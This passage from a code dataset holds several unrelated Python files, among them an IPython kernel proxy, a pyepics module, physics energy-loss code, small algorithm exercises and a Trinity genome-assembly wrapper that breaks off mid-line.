(5*cfg.xbar_size, 9*cfg.xbar_size, cfg.xbar_size)\ndict_list.append (i_temp.copy())\n\n# Copy output of layer0-fw pass to enable layer2-acc (from mat0-f-outMem to mat0-d-inMem)\ni_temp = i_copy (4*cfg.xbar_size, cfg.xbar_size, cfg.xbar_size)\ndict_list.append (i_temp.copy())\n\n# MVM instruction to acc for layer 0 (MVMU0)\ni_temp = i_mvm(['001', '000'])\ndict_list.append (i_temp.copy())\n\n# CRS instruction to populate populate xbar values in f/b-xbar from d-xbar for MVMU 0&1\n# here crs emulates the digital outer product (1 xbar read from f/b xbar, 2 xbar writes to f anf b xbars)\ni_temp = i_crs(['1', '1'])\ndict_list.append (i_temp.copy())\n\n## Store output of layer 1 to tile memory\n#i_temp = i_store(d1=datamem_off+1, r1=7*cfg.xbar_size, counter=1, store_width=16, vec=cfg.xbar_size/16)\n#dict_list.append(i_temp.copy())\n\n# Add a halt instruction\ni_temp = i_hlt()\ndict_list.append (i_temp.copy())\n\nfilename = path+'/tile1/core_imem0.npy'\nnp.save(filename, dict_list)\nprint ('Total no. of instructions: ', len(dict_list))\n\n\n## VALIDATE WITH SOFTWARE OUTPUT (compare new weight after back-prop)\n\n\n","sub_path":"test/val/old/mlp_train_2layer_digital.py","file_name":"mlp_train_2layer_digital.py","file_ext":"py","file_size_in_byte":6081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"36933802","text":"from PyQt5.QtCore import QTimer, QObject, pyqtSignal\n\nfrom Classes.Measurement import Measurement\n\nclass QueueService(QObject):\n\n #Signals\n addMeasurementToList = pyqtSignal(Measurement)\n clearList = pyqtSignal()\n\n def __init__(self, messengerService, measurementService, optionService):\n \"\"\"\n Service that handles the queues of measurements: schuedules, starts, deletes, resets them\n\n :param messengerService:\n :param measurementService:\n \"\"\"\n QObject.__init__(self)\n\n self.uiMessenger = messengerService\n self.measurementService = measurementService\n self.optionService = optionService\n\n\n self.queueFolder = ''\n\n self.queuedMeasurements = []\n\n self.wireSignals()\n\n def wireSignals(self):\n \"\"\"\n\n \"\"\"\n pass\n\n\n def queueMeasurement(self, procedure, parameters):\n \"\"\"\n\n :param procedure:\n :param parameters:\n \"\"\"\n measurement = Measurement(procedure, parameters, measurementService=self.measurementService, tempSave=self.optionService.getTempSave())\n\n if len(self.queuedMeasurements) > 0:\n self.queuedMeasurements[-1].setNext(measurement)\n\n self.queuedMeasurements.append(measurement)\n\n self.addMeasurementToList.emit(measurement)\n\n\n def clearQueue(self):\n \"\"\"\n\n \"\"\"\n print('clear queued trigged')\n self.queuedMeasurements = []\n self.uiMessenger.clearQueue.emit()\n self.uiMessenger.updateVariableStatusBar.emit('Queue Cleared')\n\n\n self.clearList.emit()\n\n def resetQueue(self):\n \"\"\"\n\n \"\"\"\n newMeasurements = []\n\n for measurement in self.queuedMeasurements:\n newMeasurement = Measurement(measurement.procedure, measurement.parameters, measurementService=measurement.measurementService, tempSave=self.optionService.getTempSave())\n newMeasurements.append(newMeasurement)\n\n for i, measurement in enumerate(newMeasurements):\n if not i == len(newMeasurements)-1:\n measurement.setNext(newMeasurements[i+1])\n\n self.queuedMeasurements = newMeasurements\n self.clearList.emit()\n\n for measurement in self.queuedMeasurements:\n self.addMeasurementToList.emit(measurement)\n\n\n def processQueue(self, queueFolder):\n \"\"\"\n\n :param queueFolder:\n \"\"\"\n print('process 
queue triggered')\n self.queueFolder = queueFolder\n self.currentMeasurementID = 0\n\n alreadyFinished = False\n\n for measurement in self.queuedMeasurements:\n if measurement.finished == True:\n alreadyFinished = True\n\n\n if alreadyFinished == True:\n self.resetQueue()\n self.uiMessenger.updateVariableStatusBar.emit('Processing Queue')\n self.measurementService.startQueueMeasurement(self.queuedMeasurements[0], self.queueFolder)\n # self.measurementService.measurementFinish.connect(self.processFurther)\n else:\n if len(self.queuedMeasurements) > 0:\n self.uiMessenger.updateVariableStatusBar.emit('Processing Queue')\n self.measurementService.startQueueMeasurement(self.queuedMeasurements[0], self.queueFolder)\n # self.measurementService.measurementFinish.connect(self.processFurther)\n else:\n self.uiMessenger.updateVariableStatusBar.emit('Queue is empty')\n\n\n # def processFurther(self):\n # self.currentMeasurementID = self.currentMeasurementID + 1\n # if self.currentMeasurementID < len(self.queuedMeasurements):\n # self.measurementService.startQueueMeasurement(self.queuedMeasurements[self.currentMeasurementID], self.queueFolder)\n # else:\n # self.messengerService.updateVariableStatusBar.emit('Queue finished')\n # self.measurementService.measurementFinish.disconnect(self.processFurther)","sub_path":"Services/QueueService.py","file_name":"QueueService.py","file_ext":"py","file_size_in_byte":3971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"619939049","text":"# Python program to print the first non-repeating character\nNO_OF_CHARS = 256\n \n# Fills count array with frequency of characters\ndef fillCharCounts(string, count):\n for i in string:\n count[ord(i)] += 1\n return count\n \n# The function returns index of first non-repeating\n# character in a string. If all characters are repeating\n# then returns -1\ndef firstNonRepeating(string):\n count = [0] * NO_OF_CHARS\n count = fillCharCounts(string, count)\n index = -1\n k = 0\n \n for i in string:\n if count[ord(i)] == 1:\n index = k\n break\n k += 1\n \n return index\n \n# Driver program to test above function\nstring = input(\"Enter the string : \")\nindex = firstNonRepeating(string)\nif index==-1:\n print (\"Either all characters are repeating or string is empty\")\nelse:\n print (\"First non-repeating character is \", string[index])\n","sub_path":"String/3_find_first_non_repeating_character_from_string.py","file_name":"3_find_first_non_repeating_character_from_string.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"281122092","text":"#! 
/usr/bin/env python3\n\nimport sys\nimport os.path\nimport shutil\nimport subprocess\nimport threading\n\nimport json\nimport zmq\n\n### Communications ###\n\ndef encode_dict(d):\n return bytes(json.dumps(d), \"utf-8\")\n\ndef wire_serialize(header, content, parent_header=None, metadata=None, identities=None):\n msg_parts = []\n if identities:\n msg_parts.extend(identities)\n msg_parts.append(b'')\n msg_parts.append(encode_dict(header))\n msg_parts.append(encode_dict(parent_header) if parent_header else b'{}')\n msg_parts.append(encode_dict(metadata) if metadata else b'{}')\n msg_parts.append(encode_dict(content))\n\n return msg_parts\n\ndef message_send(socket, msg_parts):\n socket.send_multipart(msg_parts)\n\ndef message_recv(socket):\n return socket.recv_multipart()\n\ndef wire_deserialize(msg_parts):\n identities = []\n\n index = 0\n while msg_parts[index] != b'':\n identities.append(msg_parts[index])\n index += 1\n\n # delimiter found\n index += 1\n signature = msg_parts[index]\n header = msg_parts[index+1]\n parent_header = msg_parts[index+2]\n metadata = msg_parts[index+3]\n content = msg_parts[index+4]\n\n return (identities, signature, header, parent_header, metadata, content)\n\ndef gen_endpoint(transport, ip, port=None):\n return \"{}://{}\".format(transport, ip) + (\":{}\".format(port) if port else \"\")\n\nclass ZMQAgent:\n def __init__(self, config, kernel):\n self.config = config\n self.kernel = kernel\n self.ctx = zmq.Context.instance()\n\n self.shell = self.ctx.socket(zmq.ROUTER)\n self.iopub = self.ctx.socket(zmq.PUB)\n\n def bind(self):\n config = self.config # XXX: shortcut\n\n if 'shell-port' in config:\n self.shell.bind(gen_endpoint(config['transport'], config['ip'], config['shell-port']))\n else:\n config['shell-port'] = self.shell.bind_to_random_port(gen_endpoint(config['transport'], config['ip']))\n\n if 'iopub-port' in config:\n self.iopub.bind(gen_endpoint(config['transport'], config['ip'], config['iopub-port']))\n else:\n config['iopub-port'] = self.iopub.bind_to_random_port(gen_endpoint(config['transport'], config['ip']))\n\n def start_heartbeat(self):\n config = self.config\n heartbeat = self.ctx.socket(zmq.REP)\n \n def heartbeat_loop():\n while self.heartbeat_running:\n msg = heartbeat.recv()\n heartbeat.send(msg)\n\n heartbeat.close()\n\n # install the heartbeat thread\n if 'hb-port' in config:\n heartbeat.bind(gen_endpoint(config['transport'], config['ip'], config['hb-port']))\n else:\n config['hb-port'] = heartbeat.bind_to_random_port(gen_endpoint(config['transport'], config['ip']))\n\n self.heartbeat_running = True\n hb_thread = threading.Thread(target=heartbeat_loop, name=\"heartbeat\", daemon=True)\n hb_thread.start()\n\n # main thread does not wait of course\n\n def main_loop(self):\n raise NotImplementedError(\"Not implemented\")\n\n### Command line and configuration ###\n\nclass CmdLineError(Exception):\n pass\n\ndef duplicate_cmdline_opt(opt):\n return \"Option `{}` already specified, please stop babbling ;-).\".format(opt)\n\ndef unexpected_cmdline_opt(opt):\n return \"Don't know what to do with option `{}` on the command line, sorry.\".format(opt)\n\ndef parse_command_line(args):\n config = { 'proxy_script_path': os.path.abspath(args[0]) }\n #print(\"proxy script path = {}\".format(config['proxy_script_path']))\n config['transport'] = \"tcp\" # default transport = tcp\n config['ip'] = \"127.0.0.1\" # default ip is loopback\n\n opts = ['--kernel-program', '--kernel-options', '--profile-dir', '--profile-name', '--ipython-program', '--ipython-options', 
'--shell-port']\n\n for arg in args[1:]:\n arg_consumed = False\n for opt in opts:\n if arg.startswith(opt + '='):\n if opt[2:] in config:\n raise CmdLineError(duplicate_cmdline_opt(opt))\n else:\n config[opt[2:]] = arg[len(opt)+1:]\n arg_consumed = True\n break\n if not arg_consumed:\n raise CmdLineError(unexpected_cmdline_opt(arg))\n\n return config\n\nclass ConfigError(Exception):\n pass\n\ndef check_ipython_version(config, req_ipython_version_major, min_ipython_version_minor):\n try:\n ipython_version_string = subprocess.check_output([config['ipython-program'], \"--version\"]).decode()\n except FileNotFoundError:\n raise ConfigError(\"IPython program `{}` cannot be found despite all our efforts, sorry.\".format(config['ipython-program']))\n except subprocess.CalledProcessError as e:\n raise ConfigError(\"IPython program complains: {}\".format(e))\n\n config['ipython-version-string'] = ipython_version_string[:-1] if ipython_version_string.endswith('\\n') else ipython_version_string\n\n ipython_version = tuple([int(d) for d in ipython_version_string.split(\".\")])\n #print(\"ipython version = {}\".format(ipython_version))\n if (ipython_version[0] != req_ipython_version_major) or (ipython_version[1] < min_ipython_version_minor):\n raise ConfigError(\"Required IPython version is v{}.x.y (x >= {}), version found=v{}\".format(req_ipython_version_major, \n min_ipython_version_minor,\n ipython_version_string))\n \ndef check_configuration(config, req_ipython_version_major, min_ipython_version_minor):\n if 'kernel-program' not in config:\n raise ConfigError(\"Kernel program must be specifed, this is a proxy for something !\")\n \n if 'ipython-program' not in config:\n config['ipython-program'] = \"ipython\" # default name\n\n check_ipython_version(config, req_ipython_version_major, min_ipython_version_minor)\n\n \n ipython_program_path = shutil.which(config['ipython-program'])\n if not ipython_program_path:\n raise ConfigError(\"IPython program `{}` cannot be found despite all our efforts, sorry.\".format(config['ipython-program']))\n else:\n config['ipython-program-path'] = ipython_program_path\n\n if 'shell-port' in config:\n config['shell-port'] = int(config['shell-port'])\n \n\n### Main program ###\n\ndef halt(message, error_code=1):\n print(message, file=sys.stderr)\n print(\"Bye bye !\", file=sys.stderr)\n sys.exit(error_code)\n\nif __name__ == \"__main__\":\n\n # 1. Configuration\n\n try:\n config = parse_command_line(sys.argv)\n check_configuration(config, req_ipython_version_major=2, min_ipython_version_minor=0)\n except CmdLineError as err:\n halt(\"\"\"Command line error\n => {}\"\"\".format(err))\n except ConfigError as err:\n halt(\"\"\"Configuration error\n => {}\"\"\".format(err))\n\n # 2. Spawn and control kernel program\n kernel = KernelProcess(config)\n kernel.spawn()\n\n # 3. Creation of ZMQ agent\n agent = ZMQAgent(config, kernel)\n \n agent.bind()\n agent.start_heartbeat()\n\n print(\"config = {}\".format(config))\n\n # 4. Spawn the Ipython frontend\n spawn_ipython_frontend(config)\n\n # 5. 
Enter main loop\n agent.main_loop()\n\n\n","sub_path":"ipython-kernel-proxy.py","file_name":"ipython-kernel-proxy.py","file_ext":"py","file_size_in_byte":7367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"63290939","text":"from ._version import get_versions\n__version__ = get_versions()['version']\ndel get_versions\n\n__doc__ = \"\"\"\n epics channel access python module\n\n version: %s\n Principal Authors:\n Matthew Newville CARS, University of Chicago\n Angus Gratton , Australian National University\n\n== License:\n\n Except where explicitly noted, this file and all files in this\n distribution are licensed under the Epics Open License See license.txt in\n the top-level directory of this distribution.\n\n== Overview:\n Python Interface to the Epics Channel Access\n protocol of the Epics control system.\n\n\"\"\" % (__version__)\n\n\nimport time\nimport sys\nimport threading\nfrom . import ca\nfrom . import dbr\nfrom . import pv\nfrom . import alarm\nfrom . import device\nfrom . import motor\nfrom . import multiproc\n\nPV = pv.PV\nAlarm = alarm.Alarm\nMotor = motor.Motor\nDevice = device.Device\npoll = ca.poll\n\nget_pv = pv.get_pv\n\nCAProcess = multiproc.CAProcess\nCAPool = multiproc.CAPool\n\n# some constants\nNO_ALARM = 0\nMINOR_ALARM = 1\nMAJOR_ALARM = 2\nINVALID_ALARM = 3\n\n_PVmonitors_ = {}\n\ndef caput(pvname, value, wait=False, timeout=60):\n \"\"\"caput(pvname, value, wait=False, timeout=60)\n simple put to a pv's value.\n >>> caput('xx.VAL',3.0)\n\n to wait for pv to complete processing, use 'wait=True':\n >>> caput('xx.VAL',3.0,wait=True)\n \"\"\"\n start_time = time.time()\n thispv = get_pv(pvname, timeout=timeout, connect=True)\n if thispv.connected:\n timeout -= (time.time() - start_time)\n return thispv.put(value, wait=wait, timeout=timeout)\n\ndef caget(pvname, as_string=False, count=None, as_numpy=True,\n use_monitor=False, timeout=5.0):\n \"\"\"caget(pvname, as_string=False,count=None,as_numpy=True,\n use_monitor=False,timeout=5.0)\n simple get of a pv's value..\n >>> x = caget('xx.VAL')\n\n to get the character string representation (formatted double,\n enum string, etc):\n >>> x = caget('xx.VAL', as_string=True)\n\n to get a truncated amount of data from an array, you can specify\n the count with\n >>> x = caget('MyArray.VAL', count=1000)\n \"\"\"\n start_time = time.time()\n thispv = get_pv(pvname, timeout=timeout, connect=True)\n if thispv.connected:\n if as_string:\n thispv.get_ctrlvars()\n timeout -= (time.time() - start_time)\n val = thispv.get(count=count, timeout=timeout,\n use_monitor=use_monitor,\n as_string=as_string,\n as_numpy=as_numpy)\n poll()\n return val\n\ndef cainfo(pvname, print_out=True, timeout=5.0):\n \"\"\"cainfo(pvname,print_out=True,timeout=5.0)\n\n return printable information about pv\n >>>cainfo('xx.VAL')\n\n will return a status report for the pv.\n\n If print_out=False, the status report will be printed,\n and not returned.\n \"\"\"\n start_time = time.time()\n thispv = get_pv(pvname, timeout=timeout, connect=True)\n if thispv.connected:\n conn_time = time.time() - start_time\n thispv.get(timeout=timeout-conn_time)\n get_time = time.time() - start_time\n thispv.get_ctrlvars(timeout=timeout-get_time)\n if print_out:\n ca.write(thispv.info)\n else:\n return thispv.info\n\ndef camonitor_clear(pvname):\n \"\"\"clear a monitor on a PV\"\"\"\n if pvname in _PVmonitors_:\n _PVmonitors_[pvname].remove_callback(index=-999)\n _PVmonitors_.pop(pvname)\n\ndef camonitor(pvname, writer=None, 
callback=None):\n \"\"\" camonitor(pvname, writer=None, callback=None)\n\n sets a monitor on a PV.\n >>>camonitor('xx.VAL')\n\n This will write a message with the latest value for that PV each\n time the value changes and when ca.poll() is called.\n\n To write the result to a file, provide the writer option a write method\n to an open file or some other method that accepts a string.\n\n To completely control where the output goes, provide a callback method\n and you can do whatever you'd like with them.\n\n Your callback will be sent keyword arguments for pvname, value, and\n char_value Important: use **kwd!!\n \"\"\"\n\n if writer is None:\n writer = ca.write\n if callback is None:\n def callback(pvname=None, value=None, char_value=None, **kwds):\n \"generic monitor callback\"\n if char_value is None:\n char_value = repr(value)\n writer(\"%.32s %s %s\" % (pvname, pv.fmt_time(), char_value))\n\n thispv = get_pv(pvname, connect=True)\n if thispv.connected:\n thispv.get()\n thispv.add_callback(callback, index=-999, with_ctrlvars=True)\n _PVmonitors_[pvname] = thispv\n\ndef caget_many(pvlist, as_string=False, count=None, as_numpy=True, timeout=5.0):\n \"\"\"get values for a list of PVs\n This does not maintain PV objects, and works as fast\n as possible to fetch many values.\n \"\"\"\n chids, out = [], []\n for name in pvlist: chids.append(ca.create_channel(name,\n auto_cb=False,\n connect=False))\n for chid in chids: ca.connect_channel(chid)\n for chid in chids: ca.get(chid, count=count, as_string=as_string, as_numpy=as_numpy, wait=False)\n for chid in chids: out.append(ca.get_complete(chid,\n count=count,\n as_string=as_string,\n as_numpy=as_numpy,\n timeout=timeout))\n return out\n\ndef caput_many(pvlist, values, wait=False, connection_timeout=None, put_timeout=60):\n \"\"\"put values to a list of PVs, as fast as possible\n This does not maintain the PV objects it makes. 
If\n wait is 'each', *each* put operation will block until\n it is complete or until the put_timeout duration expires.\n If wait is 'all', this method will block until *all*\n put operations are complete, or until the put_timeout\n duration expires.\n Note that the behavior of 'wait' only applies to the\n put timeout, not the connection timeout.\n Returns a list of integers for each PV, 1 if the put\n was successful, or a negative number if the timeout\n was exceeded.\n \"\"\"\n if len(pvlist) != len(values):\n raise ValueError(\"List of PV names must be equal to list of values.\")\n out = []\n pvs = [PV(name, auto_monitor=False, connection_timeout=connection_timeout) for name in pvlist]\n conns = [p.connected for p in pvs]\n wait_all = (wait == 'all')\n wait_each = (wait == 'each')\n for p, v in zip(pvs, values):\n out.append(p.put(v, wait=wait_each, timeout=put_timeout, use_complete=wait_all))\n if wait_all:\n start_time = time.time()\n while not all([(p.connected and p.put_complete) for p in pvs]):\n ca.poll()\n elapsed_time = time.time() - start_time\n if elapsed_time > put_timeout:\n break\n return [1 if (p.connected and p.put_complete) else -1 for p in pvs]\n else:\n return [o if o == 1 else -1 for o in out]\n\n\n","sub_path":"epics/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"123120206","text":"#--------------------\n# Imports\n\nimport os\nfrom IgnoreDirs import IgnoreDirs\n\n#\n#--------------------\n\n\nclass Partitioner:\n\t\n\tdef __init__(self, basePath, partitionPaths, newDirs, ignoreDirs):\n\t\tself.basePath = basePath\n\t\tself.partitionPaths = partitionPaths.getPartitionPaths()\n\t\tself.newDirs = newDirs\n\t\tself.ignoreDirs = ignoreDirs.getIgnoredDirs()\n\n\t#Gets the file extension to determine which JSON directory the file will go into. (WORKS)\n\tdef getFileExtension(self, filePath):\n\t\tdotIndex = filePath.rfind(\".\", 0, len(filePath))\n\t\textension = filePath[dotIndex + 1:len(filePath)]\n\t\treturn extension\n\n\t#Get the file name without the extension. 
(WORKS)\n\tdef getFileName(self, filePath):\n\t\tdotIndex = filePath.rfind(\".\", 0, len(filePath))\n\t\tif (\"/\" in filePath):\n\t\t\tslashIndex = (filePath.rfind(\"/\", 0, len(filePath)) + 1)\n\t\telif (\"\\\\\" in filePath):\n\t\t\tslashIndex = (filePath.rfind(\"\\\\\", 0, len(filePath)) + 1)\n\t\telse: slashIndex = 0\n\t\tfileName = filePath[slashIndex:dotIndex]\n\t\treturn fileName\n\n\t#Create the keys and set the values as blank lists for the newDirs dictionary\n\tdef setUpDirsDict(self):\n\t\tfor key in self.partitionPaths.keys():\n\t\t\tself.newDirs[key] = []\n\n\t#Copies the file to the new path and appends them to the newDirs dictionary so they can be used by the parser.\n\tdef copyFileToNewPath(self, oldFilePath): \n\t\textension = self.getFileExtension(oldFilePath)\n\t\tfileName = self.getFileName(oldFilePath)\n\t\tfNe = (fileName + \".\" + extension)\n\t\toldFile = open(oldFilePath, \"r\")\n\t\tif (extension in self.partitionPaths.keys()):\n\t\t\tcpPath = self.partitionPaths[extension]\n\t\t\tif not os.path.exists(cpPath):\n\t\t\t\tos.makedirs(cpPath)\n\t\t\tnewFile = open((cpPath + fNe), \"w\")\n\t\t\tself.newDirs[extension].append(cpPath + fNe)\n\t\t\tfor line in oldFile:\n\t\t\t\tnewFile.write(line)\n\t\t\tnewFile.close()\n\t\telse: print(\"extension {\" + extension + \"} was not in the dirs list\")\n\n\tdef partitionAllFiles(self):\n\t\tfor (dirpath, dirnames, filenames) in os.walk(self.basePath):\n\t\t\ti = 1\n\t\t\t#Checks to make sure the dirpath isn't a part of the ignored directories list.\n\t\t\tfor ignoreDir in self.ignoreDirs:\n\t\t\t\t#The dirpath contained an ignored directory\n\t\t\t\tif ignoreDir in dirpath:\n\t\t\t\t\tprint(\"a substring of the file path {\" + dirpath + \"} was included in the Ignore Dirs list\")\n\t\t\t\t\ti = 0\n\t\t\t\t\tbreak\n\t\t\t#dirpath wasn't in the ignored directories list. 
So, continue to partition the files.\n\t\t\tif i == 1:\n\t\t\t\tfor fName in filenames:\n\t\t\t\t\ttmpName = (dirpath + \"/\" + fName)\n\t\t\t\t\tif self.getFileExtension(tmpName) in self.partitionPaths.keys():\n\t\t\t\t\t\tself.copyFileToNewPath(tmpName)\n\n","sub_path":"codeParse/back-end/python/Partitioner.py","file_name":"Partitioner.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
+{"seq_id":"597095660","text":"#!/usr/bin/env python\nimport scipy as sp\nimport numpy as np\nimport astropy as astro\nimport math\nimport constants as const\nimport specShapes as specsh\nimport crossSection as crs\nimport model as mod\n\nfrom scipy import special\nfrom scipy import interpolate  # registers scipy.interpolate so sp.interpolate below resolves\n\nclass energyLoss(object):\n    ''' class that calculates energy losses for synchrotron, bremsstrahlung\n    and IC\n    it stores the cooling timescales for each process\n    '''\n    \n    def __init__(self,spec='',proc='',source='',coolingType=''):\n        self.spec=spec\n        self.proc=proc\n        self.source=source\n        self.cType=coolingType\n\n    def IC_Edot(self,Eph,Ee,EdNdE_ph):\n        f = np.sqrt(Eph[1] / Eph[0])\n        dEph = Eph * (f - 1/f)\n\n        E_gb = np.logspace(np.log10(Ee) - 10., np.log10(Ee), 101)\n        E_g = np.sqrt(E_gb[1:] * E_gb[:-1])\n        dE_g = E_gb[1:] - E_gb[:-1]\n        \n        sgm = np.zeros_like(Eph)\n        \n        for i in range(len(E_g)):\n            sgm += crs.sigmaIC(E_g[i], Eph, Ee)[:,0] * dE_g[i]\n\n\n        return const.C*const.m2cm* np.sum(sgm * EdNdE_ph/Eph * dEph)\n\n    def Sync_Edot(self,B,Ee,pitch):\n        '''\n        calculate the synchrotron energy loss for an electron with energy E_e\n        INPUT:\n        B - magn field (micro Gauss)\n        pitch - sin of alpha (pitch angle)\n        E_e - electron energy (GeV)\n        OUTPUT:\n        Edot - energy loss\n        \n        '''\n        \n        def bessel_int_values():\n            #dr = 0.00005\n            #rs = np.arange(0. + dr/2., 5., dr)\n            rsb = np.logspace(-7., 1., 10001)\n            rs = np.sqrt(rsb[1:] * rsb[:-1])\n            dr = (rsb[1:] - rsb[:-1])\n            \n\n            nn = 5./3.\n            ks = sp.special.kv(nn, rs)\n            k_int = np.zeros_like(ks)\n\n            k_int[0] = ks[0] * dr[0]\n            for i in range(1, len(ks)):\n                k_int[i] = k_int[i-1] + ks[i] * dr[i]\n            k_tot = np.sum(ks * dr)\n            k_int = k_tot - k_int\n\n            return rs, k_int\n\n        rs, k_int = bessel_int_values()\n\n        func0 = sp.interpolate.interp1d(rs, k_int, fill_value=0.)\n        def func(r):\n            if r > 2.e-7 and r < 5.:\n                return func0(r)\n            else:\n                return 0.\n\n        bessel_int = np.frompyfunc(func, 1, 1)\n\n        def synch_norm(B):\n            '''\n            normalization factor in synchrotron energy loss\n            INPUT:\n            B - magn field (micro Gauss)\n            OUTPUT:\n            normalization factor (GeV / s)\n\n            '''\n            return np.sqrt(3.) * const.eGauss**3 * 1.e-6 * B / const.ME_GeV * const.erg2GeV**2\n        def nu_crit_norm(B):\n            norm = 3 * const.H_Erg * const.C*const.m2cm * const.eGauss * 1.e-6 * const.erg2GeV**2* B / (4*np.pi * const.ME_GeV**3 * const.H_eV*1.e-9)\n            #norm = 3 * ee * micro * B / (4*np.pi * me**3) * c_light * erg2GeV\n            return norm\n\n        def nu_critical(B, sin_al, E):\n            '''\n            critical frequency\n            INPUT:\n            B - magnetic field (micro Gauss)\n            sin_al = sin(alpha),\n            where alpha - angle between magnetic field and electron velocity\n            E - electron energy (GeV)\n            OUTPUT:\n            critical frequency (Hz)\n            \n            '''\n            norm = nu_crit_norm(B)\n            \n            if type(E) is np.ndarray and type(sin_al) is np.ndarray:\n                return norm * np.outer(sin_al, E**2)\n            else:\n                return norm * sin_al * E**2\n            \n        def single_E(E):\n            nuc = nu_critical(B, pitch, E)\n            #print 'nuc = %.2e GHz' % (nuc / 1.e-9)\n            nus = np.logspace(np.log10(nuc)-7., np.log10(nuc)+1., 200)\n            f = np.sqrt(nus[1] / nus[0])\n            d_nus = nus * (f - 1./f)\n            SS = nus / nuc * bessel_int(nus / nuc)\n            \n            return synch_norm(B) * np.sum(SS * d_nus)\n        \n        edot_vec= np.frompyfunc(single_E, 1, 1)\n        return edot_vec(Ee)\n","sub_path":"energyLoss.py","file_name":"energyLoss.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
+{"seq_id":"498869981","text":"def longestSub(s, k):\n    current = \"\"\n\n    for i in reversed(range(len(s))):\n        for j in range(i+1):\n            sub = s[j:i+1]\n            if isValid(sub, k) and len(sub) > len(current):\n                current = sub\n    \n    return current\n    \ndef isValid(s, k):\n    counter = {}\n\n    for char in s:\n        if not char in counter:\n            counter[char] = 1\n        else:\n            counter[char] += 1\n    \n    for el in counter:\n        if counter[el] < k:\n            return False\n\n    return True\n\n\ns1 = 'aaabb'\nprint(longestSub(s1, 2))\n\n","sub_path":"string/longest_sub.py","file_name":"longest_sub.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
+{"seq_id":"436686029","text":"# Dynamic programming, recursive function for p(n),\n# Gru_dat, Alexander Fagerlund\n\ndef p(n,h):\n    \"\"\"Recursively calculates maximum profit...\n    from making scarves from n meters of yarn, where\n    n is a natural number.\n    Time complexity: O(exp(n)).\"\"\"\n    prev = 0\n    if n == 0:\n        return 0\n    else:\n        for i in range (1,n+1):\n            if i <= 4:\n                new = h[i]+p(n-i,h)\n                if prev < new:\n                    prev = new\n            else:\n                new = p(n-i-1,h)\n                if prev < new:\n                    prev = new\n        maximum = prev\n        return maximum\n\n\n# Unit test:\nh = [0,2,5,6,9]\nassert p(5,h) == 12\nassert p(4,h) == 10\nassert p(3,h) == 7\nassert p(2,h) == 5\nassert p(1,h) == 2\nassert p(0,h) == 0\n\n","sub_path":"Ovn6_scarves.py","file_name":"Ovn6_scarves.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"241967049","text":"#!/usr/bin/env python\n\nimport argparse\nimport sys\n\n# This script performs assembly on the reads leftover after host removal\n\n# -------------------------------------\n\ndef get_arg():\n    \"\"\"Get Arguments\n    :rtype: object\n    \"\"\"\n    # parse arguments\n\n    prog_description = 'Trinity assembly'\n    parser = argparse.ArgumentParser(description=prog_description)\n\n    ## Trinity run without gunzipping the fastq files\n    parser.add_argument('-1', '--mate1', default='host_separation/unmapped_1.fastq.gz', help='mate1')\n    parser.add_argument('-2', '--mate2', default='host_separation/unmapped_2.fastq.gz', help='mate2')\n    parser.add_argument('--single', 
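help='if set, treat mate1 as single-end reads and skip mate2',  # help text added; semantics inferred from how args.single is used in assembly() and remap() below\n                        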
default=None)\n    parser.add_argument('-o', '--outputdir', default='assembly_trinity', help='the output directory')\n    parser.add_argument('--trinitymem', required=True, help='max memory for Trinity')\n    parser.add_argument('--trinitycores', required=True, help='number of cores for Trinity')\n    parser.add_argument('--trinitythreshold', required=True, help='minimum contig length for Trinity')\n    parser.add_argument('-l', '--logsdir', help='the logs directory')\n    parser.add_argument('-d', '--scripts', help='the git repository directory')\n    parser.add_argument('--noclean', help='do not delete temporary intermediate files (default: off)')\n    parser.add_argument('--verbose', type=int, default=0, help='verbose mode: echo commands, etc (default: off)')\n    args = parser.parse_args()\n\n    # add key-value pairs to the args dict\n    vars(args)['step'] = 'assembly'\n\n    # need this to get local modules\n    sys.path.append(args.scripts)\n    global hp\n    global ahp\n    from helpers import helpers as hp\n    from helpers import assembly_helpers as ahp\n\n    # error checking: exit if previous step produced zero output\n\n    if (args.single):\n        hp.check_file_exists_and_nonzero(args.mate1, step=args.step)\n    else:\n        for i in [args.mate1, args.mate2]:\n            hp.check_file_exists_and_nonzero(i, step=args.step)\n\n    # argparse delivers --single as a string, so map the literal 'False' to the boolean False\n    if args.single == 'False':\n        args.single = False\n\n    return args\n\n# -------------------------------------\n\ndef assembly(args):\n    \"\"\"Do Trinity assembly\"\"\"\n\n    hp.echostep(args.step)\n\n    # print args\n    print(args)\n    print()\n\n    # mkdir -p assembly_trinity\n    hp.mkdirp(args.outputdir)\n\n    # perform Trinity assembly\n    if (args.single):\n        cmd = 'Trinity --seqType fq --normalize_reads --min_contig_length={args.trinitythreshold} --max_memory {args.trinitymem}G --CPU {args.trinitycores} --output {args.outputdir} --single {args.mate1}'.format(args=args)\n    else:\n        cmd = 'Trinity --seqType fq --normalize_reads --min_contig_length={args.trinitythreshold} --max_memory {args.trinitymem}G --CPU {args.trinitycores} --output {args.outputdir} --left {args.mate1} --right {args.mate2}'.format(args=args)\n    # use run_long_cmd for programs with verbose output\n    hp.run_long_cmd(cmd, args.verbose, 'log.Trinity')\n\n    print('Trinity complete')\n\n    # name of expected output file\n    myoutput = args.outputdir + '/Trinity.fasta'\n\n    # exit if no output\n    hp.check_file_exists_and_nonzero(myoutput)\n\n    # mkdir -p\n    hp.mkdirp('assembly')\n\n    # rename Trinity contigs, join sequence portion of fasta, return number of contigs\n    # cat ${outputdir}/Trinity.fasta | awk 'BEGIN{f=0; counter=1}{if 